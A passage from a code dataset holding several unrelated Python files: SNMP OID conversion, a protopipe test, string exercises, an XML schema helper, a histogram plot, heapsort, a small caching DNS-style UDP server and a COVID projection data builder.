sorted(res,key=natural_key)\n\ndef syToNum(data):\n    res=[]\n    for line in data:\n        tit,flag,value=line.partition(' = ')\n        tit=subprocess.check_output([r'D:\Program Files\usr\bin\snmptranslate.exe','-Ofn',tit],universal_newlines=True).strip()\n        print (tit+flag+value.strip())\n        res.append(tit+flag+value.strip())\n    return res\n\ndef natural_key(s):\n    return tuple(\n        int(''.join(chars)) if isdigit else ''.join(chars)\n        for isdigit, chars in itertools.groupby(s, str.isdigit)\n    )\n\ndef attCvt(data):\n    for line in data.splitlines():\n        #if line.find(r'Timeticks:')>-1:\n        #    line=re.sub('Timeticks\: .*','1',line)\n        #if line.find('OID:') >-1 and line.find('::')>-1:\n        #    value=subprocess.check_output([r'D:\Program Files\usr\bin\snmptranslate.exe','-Ofn',line[line.find('OID:')+5:]],universal_newlines=True).strip()\n        #    line=line[:line.find('OID: ')]+'OID: '+value\n        if line.find('INTEGER: ')>-1:\n            value=re.search('(\d+)',line[line.find('INTEGER: ')+9:])\n            line=line[:line.find('INTEGER: ')]+'INTEGER: '+value.group(1)\n        print (line)\n\nrootpath=r'd:/'\nfilename=r'nexus.snmpwalk'\nglobal newfile,filepath\nnewfile=rootpath+filename+'_convert'\nfilepath=rootpath+filename\ndef ConvrtOIDsInFile():\n    saveData(NBoidConvert(readcontent()))\n\ndef int2IPInFIle():\n    saveData(ipConvert(readcontent()))\n\ndef CvtsyToNum():\n    saveData(syToNum(readcontent()))\n#ConvrtOIDsInFile()\n#int2IPInFIle()\n#CvtsyToNum()\n\nif __name__ == '__main__':\n    data='''\n    sdfsf\n    '''\n    # print(data)\n    # print(data)\n    attCvt(data)\n    if os.path.exists(r\"C:\Program Files (x86)\SNMP Simulator\Data\nb.snmpwalk\"):\n        ff=open(r\"C:\Program Files (x86)\SNMP Simulator\Data\\nb.snmpwalk\",\"w\")\n        for datas in NBoidConvert(data):\n            ff.write(datas+\"\n\")\n        ff.close()","sub_path":"code/Original.py","file_name":"Original.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"87015908","text":"\"\"\"Test the data training script in a variety of conditions.\"\"\"\nfrom os import path, system\nfrom pkg_resources import resource_filename\nfrom protopipe.scripts import data_training\nfrom ctapipe.utils import get_dataset_path\n\n# TEST FILES\n# 110 events, 98 telescopes at Paranal.\n# Instruments tested: LST_LST_LSTCam, MST_MST_FlashCam, SST_ASTRI_ASTRICam\nGAMMA_TEST_LARGE = get_dataset_path(\"gamma_test_large.simtel.gz\")\n# WARNING: absolutely not sufficient!\n# This is just the only file easily usable without external resources.\n# Later on, we will need a sub-simtel file from each of the\n# MC productions expected to be analyzed with protopipe.\n\n# configuration files\nana_config = resource_filename(\"protopipe\", \"aux/example_config_files/analysis.yaml\")\n\n\ndef test_dataTraining_noImages():\n    \"\"\"Very bare test to see if the script reaches the end correctly.\n\n    WARNING: some of the cuts in the example config file are not optimized for\n    cameras other than LSTCam and NectarCam.\n    In any case, it is expected that in absence of fatal bugs, the script\n    ends successfully.\n    \"\"\"\n    exit_status = system(\n        f\"python {data_training.__file__}\\\n            --config_file {ana_config}\\\n            -o test_training_noImages.h5\\\n            -m 10\\\n            -i {path.dirname(GAMMA_TEST_LARGE)}\\\n            -f {path.basename(GAMMA_TEST_LARGE)}\"\n    )\n    assert exit_status == 0\n\n\ndef test_dataTraining_withImages():\n    \"\"\"Very bare test to see if the script reaches the end correctly.\n\n    WARNING: some of the cuts in the example config file are not optimized for\n    cameras other than LSTCam and NectarCam.\n    In any case, it is expected that in absence of fatal bugs, the script\n    ends successfully.\n    \"\"\"\n    
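# run the training script end-to-end through its command line; a zero exit status means it completed\n    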
exit_status = system(\n        f\"python {data_training.__file__}\\\n            --config_file {ana_config}\\\n            -o test_training_withImages.h5\\\n            -m 10\\\n            --save_images\\\n            -i {path.dirname(GAMMA_TEST_LARGE)}\\\n            -f {path.basename(GAMMA_TEST_LARGE)}\"\n    )\n    assert exit_status == 0\n","sub_path":"protopipe/scripts/tests/test_dataTraining.py","file_name":"test_dataTraining.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"131272604","text":"# All string exercises\n# Used to train and test basic programming skills\n#\n# The knowledge used is mainly\n# 0, indexing strings by subscript\n# 1, string slicing\n# 2, loops\n# 3, selection (that is, if)\n#\n#\n# 1,\n# Implement a function\n# that returns a string with all leading spaces removed\n# def strip_left(s)\n#\ndef strip_left(s):\n    offset = -1\n    for i in range(len(s)):\n        if s[i] != ' ':\n            offset = i\n            break\n    # print(offset)\n    if offset == -1:\n        return ''\n    else:\n        return s[offset:]\n\n# string = ' hello '\n# string = ' '\n# r = strip_left(string)\n# print(len(r), r)\n# Example\n# print(strip_left(' hello'))\n# # returns 'hello'\n# Hint: use a loop to find the index of the first non-space character, then slice and return\n#\n#\n# 2,\n# Implement a function\n# that returns a string with all trailing spaces removed\n# def strip_right(s)\n#\ndef strip_right(s):\n    end = len(s)\n    # start, stop, step\n    for i in range(len(s), 0, -1):\n        index = i - 1\n        if s[index] != ' ':\n            end = index\n            break\n    if end == len(s):\n        return ''\n    else:\n        return s[:end+1]\n\n# for i in range(5-1, -1, -1):\n#     print('i', i)\n# string = ' hello '\n# string = ' '\n# r = strip_right(string)\n# print(len(r), r)\n\n\n\n\n#\n# 3,\n# Implement a function\n# that returns a string with all leading and trailing spaces removed\n# def strip(s)\n#\ndef strip(s):\n    s1 = strip_left(s)\n    s2 = strip_right(s1)\n    return s2\n\n# string = ' hello '\n# # string = ' '\n# r = strip(string)\n# print('strip', len(r), r)\n#\n# 4,\n# Implement a function that takes one parameter s\n# and checks whether this parameter contains only spaces\n# returns True / False\n# def is_space(s)\n#\ndef is_space(s):\n    for i in s:\n        if i != ' ':\n            return False\n    return True\n#\n# 5,\n# Implement a function that takes one parameter s\n# and checks whether this parameter contains only whitespace characters\n# there are three whitespace characters: ' ' '\n' '\t'\n# returns True / False\n# def is_white(s)\n#\ndef is_white(s):\n    whites = [' ', '\n', '\t']\n    for i in s:\n        if i not in whites:\n            return False\n    return True\n\n# for i in 'hello':\n#     print(i)\n#\n# 6,\n# Implement a function that takes 2 parameters s1 s2\n# and checks whether s1 starts with s2\n# returns True / False\n# def starts_with(s1, s2)\n#\ndef starts_with(s1, s2):\n    # other languages usually do it like this\n    # for i in range(len(s2)):\n    #     if s1[i] != s2[i]:\n    #         return False\n    # return True\n    # # in Python you can do it like this\n    s1head = s1[:len(s2)]\n    # print('s1 head', s1head)\n    return s1head == s2\n\nprint(starts_with('hello', 'he'))\n# ends_with\n# if filename.ends_with('.avi'):\n#     播放(filename)\n#\n# os.name\n# Windows 98\n# Windows 2000\n# Windows xp\n# Windows 7\n# Windows 8\n# Windows 9\n# Windows 10\n# if os.name.starts_with('Windows 9'):\n    # it's win98\n\n\n# Example\n# print(starts_with('hello', 'he'))\n# # True\n#\n#\n# 7,\n# Implement a function that takes 3 parameters s old new, all strings\n# and returns a string in which the old substring of s has been replaced by new\n# assume old exists and occurs only once\n# def replace(s, old, new)\n#\ndef replace(s, old, new):\n    old_len = len(old)\n    index = s.find(old)\n    head = s[:index]\n    tail = s[index+old_len:]\n    # print(head)\n    # print(tail)\n    return head + new + tail\n\nprint(replace('hello, world!', 'world', 'gua'))\n\n# Example\n# print(replace('hello, world!', 'world', 'gua'))\n# # 'hello, gua!'\n# Hint: one find, then slice twice\n#\n#\n# 8,\n# Implement a function that takes two parameters s1 s2, both strings\n# and returns a number, the index at which s2 appears in s1\n# return -1 if it does not appear\n# def index(s1, s2)\ndef index(s1, s2):\n    i = -1\n    start = 0\n    while len(s1) >= len(s2):\n        if starts_with(s1, s2):\n            i = start\n            
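# found an occurrence: remember where it started and stop scanning (e.g. index('hello', 'll') returns 2)\n            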
break\n else:\n s1 = s1[1:]\n start += 1\n return i\nprint(index('hello', 'll'))\nprint(index('hello, world!', 'ld!'))\n#\n# 提示\n# 循环切片加 starts_with\n#\n#\n# 9,\n# 实现一个函数, 接受 2 个参数 s1 s2 都是字符串\n# 返回一个列表,列表中保存了所有 s2 出现在 s1 中的下标\n# def indices(s1, s2)\n#\ndef indices(s1, s2):\n index_list = []\n start = 0\n while len(s1) >= len(s2):\n if starts_with(s1, s2):\n index_list.append(start)\n s1 = s1[1:]\n start += 1\n return index_list\nprint('index list', indices('12211341', '1'))\n\n# 例子\n# # 01234567\n# print(indices('12211341', '1'))\n# # [0, 3, 4, 7]\n#\n# 提示: 使用 index 函数加循环\n","sub_path":"base/class11/class10_hw_ans.py","file_name":"class10_hw_ans.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"225142593","text":"import operator\nimport lxml\nimport lxml.etree as etree\n\n\ndef tagname(ns_name, nsmap):\n ns, name = ns_name.split(':')\n return '{' + nsmap[ns] + '}' + name;\n\n\nclass XmlDOMInfo(object):\n def writetoxsd(self, root, parent_el):\n raise NotImplementedError\n \n def toxml(self, xsd, root, *args):\n raise NotImplementedError\n \n def fromxml(self, xsd, root, *args):\n raise NotImplementedError\n\n\nclass XsdDocumentInfo(object):\n default_xsd_nsmap = {\n None: 'http://www.w3.org/2001/XMLSchema',\n 'xs': 'http://www.w3.org/2001/XMLSchema',\n 'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'xse': 'http://www.codesynthesis.com/xmlns/xml-schema-extension'\n }\n \n default_xml_nsmap = {\n 'xs': 'http://www.w3.org/2001/XMLSchema',\n 'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'xse': 'http://www.codesynthesis.com/xmlns/xml-schema-extension'\n }\n \n def __init__(self, nsprefix, ns):\n self.xsd_nsmap = dict(XsdDocumentInfo.default_xsd_nsmap)\n self.xsd_nsmap[nsprefix] = ns\n self.xml_nsmap = dict(XsdDocumentInfo.default_xml_nsmap)\n self.xml_nsmap[nsprefix] = ns\n self.xml_nsmap[None] = ns\n self.targetns = ns\n self.types = list()\n \n def addtype(self, tp):\n self.types.append(tp.complex_type)\n \n def obj_to_element(self, root, el, obj):\n if hasattr(type(obj), 'complex_type'):\n type(obj).complex_type.toxml(self, root, el, obj)\n el.set('{' + self.xml_nsmap['xsi'] + '}type', type(obj).complex_type.full_typename)\n else:\n el.text = str(obj)\n \n def writexsdto(self, fobj):\n xsd = etree.Element('schema', nsmap=self.xsd_nsmap)\n xsd.set('targetNamespace', self.targetns)\n for ct in self.types:\n ct.writetoxsd(xsd, xsd)\n fobj.write(etree.tostring(xsd, pretty_print=True))\n \n def writetoxml(self, roottag, obj, fobj):\n xml = etree.Element('{' + self.targetns + '}' + roottag, nsmap=self.xml_nsmap)\n self.obj_to_element(xml, xml, obj)\n fobj.write(etree.tostring(xml, pretty_print=True))\n\n\nclass XmlElementInfo(XmlDOMInfo):\n def __init__(self, name, typename, is_optional=False, is_singular=True):\n self.name = name\n self.typename = typename\n self.is_optional = is_optional\n self.is_singular = is_singular\n XmlDOMInfo.__init__(self)\n \n def writetoxsd(self, root, parent_el):\n el = etree.SubElement(parent_el, 'element')\n el.set('name', self.name)\n el.set('type', self.typename)\n if self.is_optional:\n el.set('minOccurs', '0')\n if self.is_singular:\n el.set('maxOccurs', '1')\n else:\n el.set('minOccurs', '1')\n if self.is_singular:\n el.set('maxOccurs', '1')\n self.writetoxsd_ext(el)\n \n def writetoxsd_ext(self, el):\n pass\n \n def toxml(self, xsd, root, parent_el, value):\n if value is None:\n return\n if not self.is_singular:\n for subvalue in value:\n el = 
etree.SubElement(parent_el, self.name)\n xsd.obj_to_element(root, el, subvalue)\n else:\n el = etree.SubElement(parent_el, self.name)\n xsd.obj_to_element(root, el, value)\n\n\nclass XmlRefElementInfo(XmlElementInfo):\n def __init__(self, name, target_type, *args, **kwargs):\n self.target_type = target_type\n XmlElementInfo.__init__(self, name, 'xs:IDREF', *args, **kwargs)\n \n def writetoxsd_ext(self, el):\n el.set(tagname('xse:refType', el.nsmap), self.target_type)\n\nclass XmlAttributeInfo(XmlDOMInfo):\n def __init__(self, name, typename, is_optional=False):\n self.name = name\n self.typename = typename\n self.is_optional = is_optional\n XmlDOMInfo.__init__(self)\n \n def writetoxsd(self, root, parent_el):\n el = etree.SubElement(parent_el, 'attribute')\n el.set('name', self.name)\n el.set('type', self.typename)\n if self.is_optional:\n el.set('use', 'optional')\n \n def toxml(self, xsd, root, parent_el, value):\n if value is not None:\n parent_el.set(self.name, str(value))\n\n\nclass XmlPythonProperty(object):\n def __init__(self, xmlname, xsdinfo, ctattr):\n self.attrname = '__' + xmlname + '_attr__'\n self.xsdinfo = xsdinfo\n self.ctattr = operator.attrgetter(ctattr)\n \n def __get__(self, instance, clss):\n #assert self.attrname in self.__dict__\n return getattr(instance, self.attrname)\n \n def __set__(self, instance, value):\n setattr(instance, self.attrname, value)\n \n def append_to_complex_type(self, ct):\n self.ctattr(ct).append(self)\n\ndef xml_property_func(clss, ctattr, name):\n def func(xmlname, *args, **kwargs):\n return XmlPythonProperty(xmlname, clss(xmlname, *args, **kwargs), ctattr)\n func.__name__ = name\n return func\n\nxml_attribute = xml_property_func(XmlAttributeInfo, 'attributes', 'xml_attribute')\nxml_element = xml_property_func(XmlElementInfo, 'elements', 'xml_element')\nxml_refelement = xml_property_func(XmlRefElementInfo, 'elements', 'xml_refelement')\n\nclass XmlComplexTypeInfo(XmlDOMInfo):\n def __init__(self, namespace, typename, clss, is_abstract=False, extends=None):\n self.namespace = namespace\n self.typename = typename\n self.is_abstract = is_abstract\n self.attributes = list()\n self.elements = list()\n self.extends = extends\n self.pyclss = clss\n XmlDOMInfo.__init__(self)\n \n def writetoxsd(self, root, parent_el):\n complexType_el = etree.SubElement(parent_el, 'complexType')\n complexType_el.set('name', self.typename)\n if self.is_abstract:\n complexType_el.set('abstract', 'true')\n if self.extends is not None:\n complexContent_el = etree.SubElement(complexType_el, 'complexContent')\n extension_el = etree.SubElement(complexContent_el, 'extension')\n extension_el.set('base', self.extends.namespace + ':' + self.extends.typename)\n content_el = extension_el\n else:\n content_el = complexType_el\n sequence_el = etree.SubElement(content_el, 'sequence')\n \n # Add Elements\n for element in self.elements:\n element.xsdinfo.writetoxsd(root, sequence_el)\n \n # Add Attributes\n for attribute in self.attributes:\n attribute.xsdinfo.writetoxsd(root, content_el)\n \n def fromxml(self, root, el, obj=None):\n if obj is None:\n obj = self.pyclss.__new__(self.pyclss)\n if self.extends is not None:\n self.extends.fromxml(root, el, obj)\n for attribute in self.attributes:\n attribute.__set__(obj, attribute.xsdinfo.fromxml(root, el))\n for element in self.elements:\n element.__set__(obj, element.xsdinfo.fromxml(root, el))\n \n def toxml(self, xsd, root, el, obj):\n if self.extends is not None:\n self.extends.toxml(xsd, root, el, obj)\n for attribute in 
self.attributes:\n attribute.xsdinfo.toxml(xsd, root, el, attribute.__get__(obj, type(obj)))\n for element in self.elements:\n element.xsdinfo.toxml(xsd, root, el, element.__get__(obj, type(obj)))\n \n @property\n def full_typename(self):\n return self.namespace + ':' + self.typename\n\n\ndef xml_complex_type(ns_name, is_abstract=False):\n if ':' in ns_name:\n ns, ctname = ns_name.split(':')\n else:\n raise NotImplementedError\n def xml_complex_type_dec(clss):\n if hasattr(clss, 'complex_type'):\n clss.complex_type = XmlComplexTypeInfo(ns, ctname, clss, is_abstract, clss.complex_type)\n else:\n clss.complex_type = XmlComplexTypeInfo(ns, ctname, clss, is_abstract, None)\n for name, attr in clss.__dict__.items():\n if isinstance(attr, XmlPythonProperty):\n attr.append_to_complex_type(clss.complex_type)\n return clss\n return xml_complex_type_dec\n\n\n","sub_path":"py/chill/ast/_xml.py","file_name":"_xml.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"555149453","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 17 18:04:33 2019\n\n@author: mrodgers\n\"\"\"\n\nimport numpy as np\n# import pyplot explicitly; \"import matplotlib as mpl\" alone does not expose mpl.pyplot\nimport matplotlib.pyplot as plt\n\nx = np.random.normal(0, 10, 100)\n\nplt.hist(x, bins=25, density=True)\nplt.title(\"Michael\")\nplt.xlabel(\"Random {}\".format(\"X\"))\nplt.ylabel(\"Probability\")\nplt.savefig(\"/Users/DirtyMike/Documents/other/languages/python/anaconda/packages/matplotlib/graphs/hist.pdf\",\n orientation='landscape')","sub_path":"python/anaconda/spyder/packages/matplotlib/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"601637432","text":"\"\"\"\n Written by lomizandtyd.\n Heap Sort\n - 0.1 version\n\"\"\"\n\ndef heapify(dList, root, boundary):\n child = root * 2 + 1\n large = root\n if child <= boundary and dList[large] <= dList[child]:\n large = child\n if child+1 <= boundary and dList[large] <= dList[child+1]:\n large = child + 1\n if large != root:\n dList[root], dList[large] = dList[large], dList[root]\n heapify(dList, large, boundary)\n return dList\n \ndef heapifyNOR(dList, root, boundary):\n child = root * 2 + 1\n large = root\n while child <= boundary:\n if dList[large] <= dList[child]:\n large = child\n if child+1 <= boundary and dList[large] <= dList[child+1]:\n large = child + 1\n if large == root:\n break\n dList[root], dList[large] = dList[large], dList[root]\n root = large\n child = root * 2 + 1\n return dList\n\ndef heapsort(dList):\n heapify = heapifyNOR\n length = len(dList) - 1\n # floor division keeps the start index an int under Python 3\n for root in range((length - 1) // 2, -1, -1):\n heapify(dList, root, length)\n \n for end in range(length, 0, -1):\n heapify(dList, 0, end)\n dList[end], dList[0] = dList[0], dList[end]\n return dList\n","sub_path":"other/python/heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"505172045","text":"import socket\r\nimport sys\r\nimport time\r\n\r\n# reads a file and returns a 2D list\r\ndef creatListFromFile(fileName):\r\n\tfile1 = open(fileName, 'r')\r\n\tLines = file1.readlines()\r\n\tlistFile = []\r\n\ti = 0\r\n\tfor line in Lines:\r\n\t\tlistFile.append(line.split(\",\"))\r\n\t\t# record a timestamp for when the server learned the info\r\n\t\tif (len(listFile[i]) == 3):\r\n\t\t\tlistFile[i].append(int(time.time()))\r\n\t\telse:\r\n\t\t\tthisTime = int(time.time())\r\n\t\t\tpassTime = thisTime - int(listFile[i][3])\r\n\t\t\tif int(listFile[i][2]) <= passTime:\r\n\t\t\t\tlistFile.pop(i)\r\n\t\t\t\ti = i - 1\r\n\t\ti = i + 1\r\n\tupdateFile(fileName, listFile)\r\n\treturn listFile\r\n\r\n# takes a 2D list and looks for the domain\r\n# if found, returns the inner list\r\n# else returns an empty ([]) list\r\ndef searchDomainInList (listIPs, domain):\r\n\ti = 0\r\n\tfor oneList in listIPs:\r\n\t\ttry:\r\n\t\t\tdomainInList = listIPs[i][0]\r\n\t\t\tif domainInList == str(domain):\r\n\t\t\t\treturn listIPs[i]\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\ti = i+1\r\n\treturn []\r\n# converts an array to a comma-separated string\r\ndef makeFromArrayToString(arr):\r\n\tret = \"\"\r\n\tfor w in arr:\r\n\t\tret = ret + str(w) + \",\"\r\n\tret = ret[:-1]\r\n\treturn ret\r\n\r\ndef updateFile(fileName, arrayList):\r\n\tarrStr = []\r\n\tfor line in arrayList:\r\n\t\tarrStr.append(makeFromArrayToString(line).replace(\"\\n\",\"\"))\r\n\twith open(fileName, 'w') as f:\r\n\t\tfor line in arrStr:\r\n\t\t\tf.write(\"%s\\n\" % line)\r\n\r\n\r\n# arguments from the command line\r\nmyPort = sys.argv[1]\r\nparentIP = sys.argv[2]\r\nparentPort = sys.argv[3]\r\nipsFileName = sys.argv[4]\r\n# initialize a socket\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ns.bind(('', int(myPort)))\r\n\r\n\r\nwhile True:\r\n\tclientDomain, clientAddress = s.recvfrom(1024)\r\n\tclientDomain = clientDomain.decode('utf-8')\r\n\tlistIps = creatListFromFile(ipsFileName)\r\n\tspecificLine = searchDomainInList(listIps, clientDomain)\r\n\t# if the server finds the domain in the file\r\n\tif specificLine != []:\r\n\t\tsiteInfo = makeFromArrayToString(specificLine)\r\n\t\tsiteInfo = bytes(siteInfo, 'utf-8')\r\n\t\ts.sendto(siteInfo, clientAddress)\r\n\t# else, send to the parent server\r\n\telse:\r\n\t\tclientDomain = bytes(clientDomain, 'utf-8')\r\n\t\ts.sendto(clientDomain, (parentIP, int(parentPort)))\r\n\t\tdata, parentAddress = s.recvfrom(1024)\r\n\t\tarrayToAdd = data.decode('utf-8')\r\n\t\tarrayToAdd = arrayToAdd.split(\",\")\r\n\t\tlistIps.append(arrayToAdd)\r\n\t\tupdateFile(ipsFileName, listIps)\r\n\t\ts.sendto(data, clientAddress)","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"201553823","text":"class Query:\n\n @classmethod\n def find_by_name(cls, otherClass, name):\n for object in otherClass.all():\n if object.name == name:\n return object\n # only report a miss after checking every object\n return 'there is no one named {}'.format(name)\n\n @classmethod\n def count(cls, otherClass):\n totalcount = len(otherClass.all())\n return totalcount\n\n @classmethod\n def name_starts_with(cls, otherClass, initial):\n return [object for object in otherClass.all() if object.name.startswith(initial)]\n\n @classmethod\n def is_older_than(cls, otherClass, age):\n return [object for object in otherClass.all() if object.age > age]\n\n @classmethod\n def mean_age(cls, otherClass):\n totalcount = len(otherClass.all())\n list_of_ages = [object.age for object in otherClass.all()]\n combined_ages = sum(list_of_ages)\n meanage = combined_ages / totalcount\n return meanage\n","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"480369228","text":"import pandas as pd\nimport numpy as np\nimport 
requests\nimport datetime\nimport os.path\nimport pprint\nimport shapefile\nimport simplejson\nimport statistics\nimport logging\nimport math, sys\n\nfrom urllib.parse import urlparse\nfrom collections import defaultdict\n\nfrom libs.CovidDatasets import get_public_data_base_url\nfrom libs.us_state_abbrev import US_STATE_ABBREV, us_fips\nfrom libs.datasets import FIPSPopulation\nfrom libs.datasets import JHUDataset\nfrom libs.enums import Intervention\nfrom libs.functions.calculate_projections import (\n get_state_projections_df,\n get_county_projections_df,\n)\nfrom libs.datasets.projections_schema import OUTPUT_COLUMN_REMAP_TO_RESULT_DATA\nfrom libs.datasets.results_schema import (\n RESULT_DATA_COLUMNS_STATES,\n RESULT_DATA_COLUMNS_COUNTIES,\n)\nfrom libs.constants import NULL_VALUE\n\n_logger = logging.getLogger(__name__)\n\n\ndef _get_interventions_df():\n # TODO: read this from a dataset class\n interventions_url = \"https://raw.githubusercontent.com/covid-projections/covid-projections/master/src/assets/data/interventions.json\"\n interventions = requests.get(interventions_url).json()\n return pd.DataFrame(list(interventions.items()), columns=[\"state\", \"intervention\"])\n\n\ndef _get_abbrev_df():\n # TODO: read this from a dataset class\n return pd.DataFrame(\n list(US_STATE_ABBREV.items()), columns=[\"state\", \"abbreviation\"]\n )\n\n\ncounty_replace_with_null = {\"Unassigned\": NULL_VALUE}\n\n\ndef _get_usa_by_county_df():\n # TODO: read this from a dataset class\n latest_path = JHUDataset.latest_path()\n _logger.info(f\"Loading latest JHU data from {latest_path}\")\n raw_df = pd.read_csv(latest_path, dtype={\"FIPS\": str})\n raw_df[\"FIPS\"] = raw_df[\"FIPS\"].astype(str).str.zfill(5)\n\n column_mapping = {\n \"Province_State\": \"Province/State\",\n \"Country_Region\": \"Country/Region\",\n \"Last_Update\": \"Last Update\",\n \"Lat\": \"Latitude\",\n \"Long_\": \"Longitude\",\n \"Combined_Key\": \"Combined Key\",\n \"Admin2\": \"County\",\n \"FIPS\": \"State/County FIPS Code\",\n }\n remapped_df = raw_df.rename(columns=column_mapping)\n\n # USA only\n us_df = remapped_df[(remapped_df[\"Country/Region\"] == \"US\")]\n jhu_column_names = [\n \"Province/State\",\n \"Country/Region\",\n \"Last Update\",\n \"Latitude\",\n \"Longitude\",\n \"Confirmed\",\n \"Recovered\",\n \"Deaths\",\n \"Active\",\n \"County\",\n \"State/County FIPS Code\",\n \"Combined Key\",\n # Incident rate and people tested do not seem to be available yet\n # \"Incident Rate\",\n # \"People Tested\",\n ]\n final_df = pd.DataFrame(us_df, columns=jhu_column_names)\n final_df[\"Last Update\"] = pd.to_datetime(final_df[\"Last Update\"])\n final_df[\"Last Update\"] = final_df[\"Last Update\"].dt.strftime(\"%-m/%-d/%Y %H:%M\")\n\n final_df[\"County\"] = final_df[\"County\"].replace(county_replace_with_null)\n final_df[\"Combined Key\"] = final_df[\"Combined Key\"].str.replace(\"Unassigned, \", \"\")\n final_df = final_df.fillna(NULL_VALUE)\n final_df = final_df.drop_duplicates(\n \"State/County FIPS Code\"\n ) # note this is a hack, 49053 is dupped in JHU data :(\n final_df.index.name = \"OBJECTID\"\n # assert unique key test\n assert final_df[\"Combined Key\"].value_counts().max() == 1\n assert final_df[\"State/County FIPS Code\"].value_counts().max() == 1\n\n return final_df\n\n\ndef get_usa_by_county_with_projection_df(input_dir, intervention_type):\n us_only = _get_usa_by_county_df()\n fips_df = FIPSPopulation.local().data # used to get interventions\n interventions_df = _get_interventions_df()\n projections_df 
= get_county_projections_df(\n input_dir, intervention_type, interventions_df\n )\n\n counties_decorated = (\n us_only.merge(\n projections_df,\n left_on=\"State/County FIPS Code\",\n right_on=\"FIPS\",\n how=\"inner\",\n )\n .merge(fips_df[[\"state\", \"fips\"]], left_on=\"FIPS\", right_on=\"fips\", how=\"inner\")\n .merge(interventions_df, left_on=\"state\", right_on=\"state\", how=\"inner\")\n )\n\n counties_remapped = counties_decorated.rename(\n columns=OUTPUT_COLUMN_REMAP_TO_RESULT_DATA\n )\n counties = pd.DataFrame(counties_remapped, columns=RESULT_DATA_COLUMNS_COUNTIES)\n counties = counties.fillna(NULL_VALUE)\n counties.index.name = \"OBJECTID\"\n # assert unique key test\n\n if counties[\"Combined Key\"].value_counts().max() != 1:\n raise Exception(f\"counties['Combined Key'].value_counts().max() = {counties['Combined Key'].value_counts().max()}, at input_dir {input_dir}.\")\n return counties\n\n\ndef get_usa_by_states_df(input_dir, intervention_type):\n\n us_only = _get_usa_by_county_df()\n abbrev_df = _get_abbrev_df()\n interventions_df = _get_interventions_df()\n projections_df = get_state_projections_df(\n input_dir, intervention_type, interventions_df\n )\n\n states_group = us_only.groupby([\"Province/State\"])\n states_agg = states_group.aggregate(\n {\n \"Last Update\": \"max\",\n \"Confirmed\": \"sum\",\n \"Recovered\": \"sum\",\n \"Deaths\": \"sum\",\n \"Active\": \"sum\",\n \"Country/Region\": \"first\",\n \"Latitude\": \"first\",\n \"Longitude\": \"first\"\n # People tested is currently null\n #'People Tested': 'sum'\n }\n )\n\n # basically the states_agg has full state names, the interventions have abbreviation so we need these to be merged\n states_abbrev = (\n states_agg.merge(abbrev_df, left_index=True, right_on=\"state\", how=\"left\")\n .merge(\n # inner merge to filter to only the 50 states\n interventions_df,\n left_on=\"abbreviation\",\n right_on=\"state\",\n how=\"inner\",\n )\n .merge(projections_df, left_on=\"state_y\", right_on=\"State\", how=\"left\")\n .drop([\"abbreviation\", \"state_y\", \"State\"], axis=1)\n )\n\n states_remapped = states_abbrev.rename(columns=OUTPUT_COLUMN_REMAP_TO_RESULT_DATA)\n\n states_final = pd.DataFrame(states_remapped, columns=RESULT_DATA_COLUMNS_STATES)\n states_final = states_final.fillna(NULL_VALUE)\n states_final[\"Combined Key\"] = states_final[\"Province/State\"]\n states_final[\"State/County FIPS Code\"] = states_final[\"Province/State\"].map(us_fips)\n\n states_final.index.name = \"OBJECTID\"\n # assert unique key test\n assert states_final[\"Combined Key\"].value_counts().max() == 1\n\n return states_final\n\n\n# us_only = _get_usa_by_county_df()\n# us_only.to_csv(\"results/counties.csv\")\n\n# states_final = get_usa_by_states_df()\n# states_final.to_csv('results/states.csv')\n","sub_path":"libs/build_processed_dataset.py","file_name":"build_processed_dataset.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"107757901","text":"import os\nimport time\nfrom string import punctuation\n\nimport nltk\nimport pandas as pd\n# from gensim.models import Word2Vec\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\nnltk.download('stopwords')\nnltk.download('punkt')\nos.listdir(\".\")\n\nstop_words = set(stopwords.words('english'))\ntable = str.maketrans('', '', 
